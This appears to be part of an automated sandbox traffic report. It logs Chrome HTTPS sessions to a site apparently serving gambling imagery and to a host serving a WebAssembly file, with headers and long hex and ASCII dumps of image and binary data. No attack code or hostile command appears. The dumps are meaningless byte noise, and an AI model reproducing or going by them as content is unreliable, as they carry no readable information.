                                                                                                                                                          2024-06-09 22:41:19 UTC2776INData Raw: 00 01 02 06 60 3f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0f 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 0c c0 7e 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 11 01 03 70
                                                                                                                                                          Data Ascii: `?@ @ @ @8R @ @ @0 @ @ @D" @ @ @ @ @ @ @ @ "`) @ @ @~ @ @ @p
                                                                                                                                                          2024-06-09 22:41:19 UTC4096INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 c0 00 ec 07 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 10 11 30 00 47 8a 14 83 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 06 60 3f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0f 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                                                                          Data Ascii: @ @ @ @ @ @ 0G @ @ @`?@ @ @ @8R @ @ @0 @ @ @D" @ @ @ @ @ @
                                                                                                                                                          2024-06-09 22:41:19 UTC4096INData Raw: 87 be 6e 47 77 e0 51 08 10 20 40 80 00 01 02 04 08 10 20 40 a0 25 60 00 6e f5 29 0d 01 02 77 14 58 f9 06 e9 1d 1f c7 5b 13 20 40 80 00 01 02 04 08 04 05 56 ff cc b9 f2 ba 95 71 fd 7d af bf e4 be fa 53 f6 67 de 73 25 d7 fb 33 2e fc 9f 14 82 e7 24 12 01 02 04 08 10 20 40 80 00 01 02 43 05 0c c0 43 8b 17 9b 00 01 02 15 01 df dc ab 34 29 07 01 02 04 08 10 20 40 60 9f 02 9b 7e ea 7d 61 88 3e 3b b0 af 8e eb ab af 3b 57 c7 e2 4f cb fb 73 fb 3e ef db 53 11 20 40 80 00 01 02 04 08 34 05 0c c0 cd 5e a5 22 40 80 00 01 02 4f 13 f0 cd bd a7 d1 fb 60 02 04 08 10 20 40 80 c0 18 81 95 3f 73 6e 1a f3 2f 0c e2 67 ff d6 a5 36 ce 0c f3 4b bf 8a 7e c3 4f bd af 38 8e 39 32 41 09 10 20 40 80 00 01 02 07 16 30 00 1f b8 3c 8f 4e 80 00 01 02 04 08 10 f8 8a 80 6f ec 7d 45 c9 d7 10
                                                                                                                                                          Data Ascii: nGwQ @ @%`n)wX[ @Vq}Sgs%3.$ @CC4) @`~}a>;;WOs>S @4^"@O` @?sn/g6K~O892A @0<No}E
                                                                                                                                                          2024-06-09 22:41:19 UTC4096INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 8c 16 30 00 8f ae 5f 78 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 4a 02 06 e0 52 9b b2 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 30 5a c0 00 3c ba 7e e1 09 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 28 09 18 80 4b 6d ca 42 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 68 01 03 f0 e8 fa 85 27 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 a0 24 60 00 2e b5 29 0b 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 a3 05 0c c0 a3 eb 17 9e 00 01 02 04 08 10 20 40 80 00
                                                                                                                                                          Data Ascii: @ @0_x @ @ @JR @ @ @ 0Z<~ @ @ @(KmB @ @ @h'@ @ @ @$`.) @ @ @ @
                                                                                                                                                          2024-06-09 22:41:19 UTC4368INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0d 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 0c c0 6e 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 11 01 03 70 a4 48 31 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 60 00 76 03 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 88 08 18 80 23 45 8a 41 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 03 b0 1b 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                                                                                                                          Data Ascii: @ @ @ @ @ @ @ "`) @ @ @n @ @ @pH1 @ @ @ `v @ @ @#EA @ @ @ @ @


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          538192.168.2.55031554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC649OUTGET /pc/image-pc/index/121/content_bg.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "61260a03-160c9"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 25 Aug 2021 09:14:43 GMT
                                                                                                                                                          Content-Length: 90313
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 14429948693178779852
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC2506INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 35 20 37 39 2e 31 36 33 34 39 39 2c 20 32 30 31 38 2f 30 38 2f 31 33 2d 31 36 3a 34 30 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Ducky</http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:19 UTC2800INData Raw: f7 10 28 50 28 50 28 50 39 4f ec 28 1c a7 f6 14 11 ca 50 4f 29 fd 85 03 94 f7 7d d4 0e 53 dd f7 50 39 5d fb 0a 07 2b bf 61 41 52 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 05 10 28 82 68 80 80 81 44 13 44 0a 20 51 01 01 04 d1 02 88 14 28 14 40 a2 05 02 05 02 05 02 05 10 28 81 44 0a 20 50 20 50 20 51 02 88 14 28 32 d8 bc 4b a4 68 b8 b8 3e 55 bf 10 e3 db 43 c0 04 b5 32 32 17 d7 e6 46 0b 7b 22 62 89 ba 13 cb 46 ba 9c 4f 30 2a 24 59 69 ce 2c 60 6f 38 e6 78 a9 1c 47 8d 0a 91 e0 ba 96 87
                                                                                                                                                          Data Ascii: (P(P(P9O(PO)}SP9]+aAR(hDD Q(@(D P P Q(2Kh>UC22F{"bFO0*$Yi,`o8xG
                                                                                                                                                          2024-06-09 22:41:19 UTC1296INData Raw: 1e fb 97 4a a8 9b 78 2d 74 f1 61 5d 2d 5c 01 1a f1 1e 9e d0 a5 18 5c 64 95 23 b4 1e 23 f6 77 28 4a 98 5a 5a f7 33 b2 b5 d7 dc d1 05 6c 61 86 5a f6 56 94 fc 15 4c 1d 9d 5e a9 a1 01 ad 9d 87 e2 dc 3d b2 3e fd 15 65 5a ce f8 aa 48 3c c8 79 9a 35 66 94 3c 48 3d 85 2d 24 cc 79 2d 2a d9 1f 6e fd 5a ed 1b 5e 3e b5 36 ab 26 19 cc 74 3e c1 69 d7 cb 15 6f 7e 9c 5a 6a b2 db b5 be bd 98 58 bb 6b ad 6f da e0 28 d7 8f 31 94 ee 27 55 1d b9 4f 67 56 d1 8a 94 4c ce 6e e1 47 0e 27 5e 05 63 d8 da 62 c6 b3 bb ac 1a c9 9b 72 c6 90 ef 7b 37 77 ee 4f ad 77 6b 5e 76 f3 0d 71 59 41 01 04 51 02 88 21 02 88 23 54 04 11 a2 05 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10
                                                                                                                                                          Data Ascii: Jx-ta]-\\d##w(JZZ3laZVL^=>eZH<y5f<H=-$y-*nZ^>6&t>io~ZjXko(1'UOgVLnG'^cbr{7wOwk^vqYAQ!#T
                                                                                                                                                          2024-06-09 22:41:19 UTC4096INData Raw: 90 f2 8a 54 7a 0a b5 8a ca f9 97 76 61 bf 55 e5 26 b6 73 69 10 71 73 3c 1a 75 2d f1 5b e9 b6 58 72 6b 8b ec 61 23 2d 73 03 09 0d 70 d6 37 76 71 57 ac d4 73 b5 fc e1 c2 9c fa b8 76 07 05 22 cb 5e de 70 c7 ea 07 1a f7 7e d2 9a 88 f2 5d b9 d0 ce d7 b6 80 38 e9 dd cc 3b 3d 68 85 ef 33 cd 0c 99 9a 1a 50 f8 8e e5 4f 18 d1 96 b2 0d ba b2 96 32 2a 4b 7d 81 da 08 d6 83 dc 59 da d2 4c cc 32 fb 76 02 2d 9f 50 09 6b 83 eb e9 ed d1 46 f7 38 5b 49 da f4 e7 ad e3 92 12 6a 0d 48 73 48 ec 70 d5 67 2e 1a 6d 18 dc 71 11 e5 20 7d 7d 89 63 e5 78 1d ae 8c 92 df be 9b 5e 8a eb 3a b6 4c fd 90 9f 1a 74 3e d3 47 2d 38 8a d0 8f 71 4f 06 dd 55 f5 3a e6 65 cb af 21 74 53 bd ae 14 35 35 1e 83 c1 77 3c f5 84 04 04 04 04 04 10 80 42 08 40 41 14 40 41 14 40 40 40 40 40 40 40 40 40 40 40
                                                                                                                                                          Data Ascii: TzvaU&siqs<u-[Xrka#-sp7vqWsv"^p~]8;=h3PO2*K}YL2v-PkF8[IjHsHpg.mq }}cx^:Lt>G-8qOU:e!tS55w<B@A@A@@@@@@@@@@@
                                                                                                                                                          2024-06-09 22:41:19 UTC2912INData Raw: a8 e3 aa 8c 0c d6 f4 e9 2e e1 9b ad b8 ce a2 8b 8b 3f d4 d6 d7 38 e8 9d 6e 5f 28 ba 2e 2f 65 be 8c 11 79 7e fe 41 fc a7 04 1d 62 d3 3d 61 36 ec c8 60 a3 81 cc bf b3 b3 b5 bb 9e e6 8d 0d 7c 57 12 4c c8 da 1c 0f 31 2c 30 bb 8f 7a 91 af f4 cb 71 5b 64 f6 5f eb 2b a0 d1 2e 1e 7c 85 8c b2 71 2c 8e d2 e1 ec 1a 9e f8 58 c2 83 e1 8c a6 56 6c ce 6b 25 99 9c 11 36 4e ee 6b b7 82 6b 43 34 86 4a 57 c3 99 44 1e 75 22 68 81 44 0a 20 51 04 d1 02 88 14 40 a2 05 10 28 81 44 0a 20 51 02 88 3b df d9 b2 71 61 8e c9 de 47 69 0c d7 17 37 31 5b 3a 67 57 cc 11 06 97 39 ad 77 65 49 5c 7e ab 9a e9 e5 92 76 d7 6f a4 e0 9b f9 ad b6 62 37 5e af 86 da db c1 73 10 2e 17 0f 63 5e da 02 7d 9a 90 e3 e2 da a9 e2 b8 df a7 65 86 f8 ba 66 f6 ca d7 2c 25 33 63 a3 63 85 39 db a9 1e f7 91 dc 5d
                                                                                                                                                          Data Ascii: .?8n_(./ey~Ab=a6`|WL1,0zq[d_+.|q,XVlk%6NkkC4JWDu"hD Q@(D Q;qaGi71[:gW9weI\~vob7^s.c^}ef,%3cc9]
                                                                                                                                                          2024-06-09 22:41:19 UTC2776INData Raw: 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 41 f4 77 4b 6c 19 8a fb 33 6f 6c b3 ee 5a 06 5a da fd 82 37 8e 50 c2 20 36 c1 a1 c4 9e 62 f2 74 41 dd 77 0e 42 de d3 7d 6d 58 e6 95 91 9b c8 f2 16 f1 73 90 d2 e7 f2 43 20 6b 2b c5 c7 cb 28 39 36 e6 da 5f 66 8b 0d d5 9b 8b 77 df 47 1e e1 9e f6 5b cb c6 3e 7b b8 88 37 84 5c b7 d9 8d c5 9c 26 ec 41 d4 b7 ed a7 4f 6e 3a 7e eb 7d d9 2b 63 da 25 96 dc f2 39 f2 c6 39 5a f6 18 2a f8 c8 93 57 06 a0 f8 e7 ac 30 74 da db 75 5b 41 d3 d9 9b 3e 14 d8 46 fb 87 b2 49 65 1f 2a 32 ca 1e 39 a6 25 c3
                                                                                                                                                          Data Ascii: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AwKl3olZZ7P 6btAwB}mXsC k+(96_fwG[>{7\&AOn:~}+c%99Z*W0tu[A>FIe*29%
                                                                                                                                                          2024-06-09 22:41:19 UTC2776INData Raw: 5f 4b 04 ad 2c 92 27 dc ca e6 39 ae d0 b5 cd 2e d4 14 c0 f1 c7 1b 58 d0 d0 28 02 91 52 0c a9 de 3b ec d8 8c 70 dc d9 46 e3 5b 18 85 96 22 f6 e0 40 d8 9a d0 d6 c6 22 e7 e4 e5 0d 00 72 d2 8a 30 31 96 8e 9a cd f1 cb 6b 2b e0 9e 17 09 21 9e 37 16 c8 c7 b0 f3 35 cd 73 75 04 1e 05 30 3d 59 1c e6 e4 ca 36 38 f2 d9 8b dc 8c 51 3b 9e 28 ae ee 25 99 ad 71 14 e6 68 91 ce d5 30 29 b0 ca 66 31 92 3e 6c 56 46 e7 1d 34 83 95 f2 5a cc f8 1c e6 8d 40 71 8c b6 b4 aa 9b 05 9b 8b 9b db bb a9 6e ef ae 65 bc bb 9c 83 2d cc ef 74 92 38 81 41 cc f7 12 e3 40 12 41 4a 02 02 02 0a 67 f3 a6 8d b0 be 57 98 18 79 9b 09 71 2c 0e 3c 48 69 d0 28 b3 23 35 ba 37 c6 f6 dd 91 c1 0e e4 cb cd 92 82 d5 ce 7d bb 25 0c 1c 8e 70 00 91 ca 1b d8 13 03 02 cb 38 59 5d 2b 5e f4 c0 d9 f3 5d 47 ea 26 6f
                                                                                                                                                          Data Ascii: _K,'9.X(R;pF["@"r01k+!75su0=Y68Q;(%qh0)f1>lVF4Z@qne-t8A@AJgWyq,<Hi(#57}%p8Y]+^]G&o
                                                                                                                                                          2024-06-09 22:41:19 UTC2776INData Raw: 4b d4 af a3 97 df e2 8a a7 cf f0 7e b8 9f 85 b7 82 3e a9 7a 95 f4 72 fb fc 51 4f 9f e1 fd 70 f8 5b 78 3b 30 fb 26 62 48 07 fa c1 71 e8 f2 19 f0 d7 99 3e ad c9 7a f9 67 f3 6b 78 64 f1 72 fd d7 d1 3d eb 8b dc 37 b8 fc 4e 2a f7 27 8e b7 73 5b 6f 7e d8 a8 25 0e 63 5c 48 a5 78 38 90 bb b8 7e a3 c7 75 97 6b 35 db c1 4d b8 6c bd 26 63 15 f5 4b d4 af a3 97 df e2 8a d7 e7 f8 3f 5c 57 e1 6d e0 1e 93 75 27 e8 e5 f7 f8 a2 a2 fa fe 19 fe 9c 3e 16 de 15 ab 5b 3a d9 b7 10 ba e5 ae 7d b3 5e d3 3b 63 20 3c b2 be d0 69 ef a2 ea db 38 e9 e0 ce 3e ae 8f ec cf d3 29 21 6c 8c 75 e9 6b 9b cc d2 2e 05 08 3f de f6 af 9c 9f 52 e7 b3 39 99 f7 3b 2f 16 b2 e3 15 f2 ce 76 c3 f5 6e 77 27 8c d6 b8 fb b9 ed 49 ed 3e 44 a6 3a ff 00 c1 5f 43 c3 bf 9b 4d 76 f1 8e 5d a6 2e 3d ad b7 1b d1 0e
                                                                                                                                                          Data Ascii: K~>zrQOp[x;0&bHq>zgkxdr=7N*'s[o~%c\Hx8~uk5Ml&cK?\Wmu'>[:}^;c <i8>)!luk.?R9;/vnw'I>D:_CMv].=
                                                                                                                                                          2024-06-09 22:41:19 UTC2800INData Raw: 87 9f 5f 17 50 13 02 2b d8 b9 66 dd 16 ba b4 1d c5 d7 6e 9c 6d ec d5 ce 1b 2b 90 92 1b fb 42 d6 cf 18 b7 9e 40 0b 9a 1e 28 e6 b0 b4 fb 2e 5b e9 e9 79 77 93 6d 75 e9 7d c8 bb 49 db da c7 7f 69 5e 92 7f 4a cb fc d2 e7 e0 2b fc 8f 3f e8 fb e2 3e 26 be 2a 5d f6 95 e9 29 69 1f ad 64 ad 3f d1 2e 7f 46 ab b7 a0 e7 b3 fb 3e f8 99 c9 ac eb 9f b9 f2 05 b7 f1 02 bd bd eb ea 63 89 f7 57 4c f3 0e c9 ec 0c 05 e3 cf 34 92 58 c0 25 70 d6 af 63 03 1f df f9 4d 5f 23 cb af 97 7d b5 ee cb ba 75 99 f6 39 ee fe fb 3f 6d ec ae 4f 31 b9 ce 4a e6 09 ae 43 ee a4 b6 6b 63 2c e7 6b 35 00 91 5f 6b 95 74 f0 fd 47 93 8b 59 ae 26 15 db 86 6d 7d af 26 c9 fb 46 ec 0c 6e d6 c0 e1 66 6d f3 ef ed 2c ad 6d 24 8e 2b 7e 7a cd 1c 4c 8c b5 94 77 b5 57 0d 15 f9 7d 0f 37 9f 6b 89 8b 6d ed 56 6f ae
                                                                                                                                                          Data Ascii: _P+fnm+B@(.[ywmu}Ii^J+?>&*])id?.F>cWL4X%pcM_#}u9?mO1JCkc,k5_ktGY&m}&Fnfm,m$+~zLwW}7kmVo
                                                                                                                                                          2024-06-09 22:41:19 UTC1296INData Raw: de c6 d7 d4 3e bb ba 49 2e 31 bb 6d a3 cb a1 8d f9 03 db e3 18 0b 1f 4f e8 71 25 d9 d5 cd eb bb b4 ec 71 49 a7 96 79 9d 34 cf 32 4a f3 57 bd d5 24 93 a9 24 af 4e 4c 74 8f 36 dc f5 aa 14 82 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 0a e1 67 34 8d 6f 79 a2 8a 3b ef 4e 36 04 79 0c 20 98 0a 3c 8d 0a e6 e4 e1 f3 3d 8f 41 eb 67 15 95 e8 cd e2 32 58 18 dc 39 8f 97 5a 53 b2 8b 87 9b 4b ac c3 ed 3d 0f 3f 1f a8 b3 c5 9f e9 fc 5f ac 22 ab c7 31 ed 58 f0 e9 97 37 d5 ff 00 cb ad b7 39 b6 a0 b8 c7 be 07 34 10 e6 e9 55 dd a5 f2 be 5f 97 1c 9d 6b e6
                                                                                                                                                          Data Ascii: >I.1mOq%qIy42JW$$NLt6g4oy;N6y <=Ag2X9ZSK=?_"1X794U_k


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          539192.168.2.55031654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC643OUTGET /pc/image-pc/video/allbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC328INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-45d6"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17878
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 2813745717354947216
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC16384INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:19 UTC1494INData Raw: 9d 29 d3 cf 48 95 d1 c9 2b d0 04 66 e9 e2 74 24 4a 16 69 07 e6 72 2b e3 e1 a5 4a 8c 12 33 01 b5 80 23 a5 2b e5 f8 e8 4a 9b ee 61 4b af 61 ae 61 4b 83 04 8b 34 0d 22 83 ed ba 30 21 94 f7 06 a3 c0 e8 05 92 09 11 92 cd 8b 2f d7 a6 ad 69 5a a6 09 4c 73 fd 7e 80 7f d7 4d 21 47 2a 69 c2 2b bd a4 75 3f 4d 35 94 12 a4 9d 20 c8 50 28 e8 29 db f6 e9 14 26 04 27 58 ee d1 c0 50 69 4f ef d0 98 52 a4 61 5a 83 46 3d bf c3 48 e9 1d 97 41 e5 5a 53 f2 f8 9d 08 74 72 dc 3d 45 41 ad 0f 87 80 d0 91 d3 0c b8 40 f7 32 dc e3 af 65 c6 cf 29 2d 22 a7 58 cb 1e a4 d2 a3 56 29 5c ce 9e 45 5a a7 79 28 06 21 c2 53 fa 77 28 ba 68 84 97 76 37 62 04 58 a0 77 89 63 3b 41 e9 bb 62 29 3f 52 7a fd 75 6e 9e e9 28 e6 14 df ce 87 22 a5 d8 dc 3e 70 c3 6b 6f 70 98 b5 82 22 5e 46 48 89 98 b9 a8 e9
                                                                                                                                                          Data Ascii: )H+ft$Jir+J3#+JaKaaK4"0!/iZLs~M!G*i+u?M5 P()&'XPiORaZF=HAZStr=EA@2e)-"XV)\EZy(!Sw(hv7bXwc;Ab)?Rzun(">pkop"^FH


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          540192.168.2.550332188.114.97.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC408OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          If-None-Match: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          2024-06-09 22:41:19 UTC662INHTTP/1.1 304 Not Modified
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
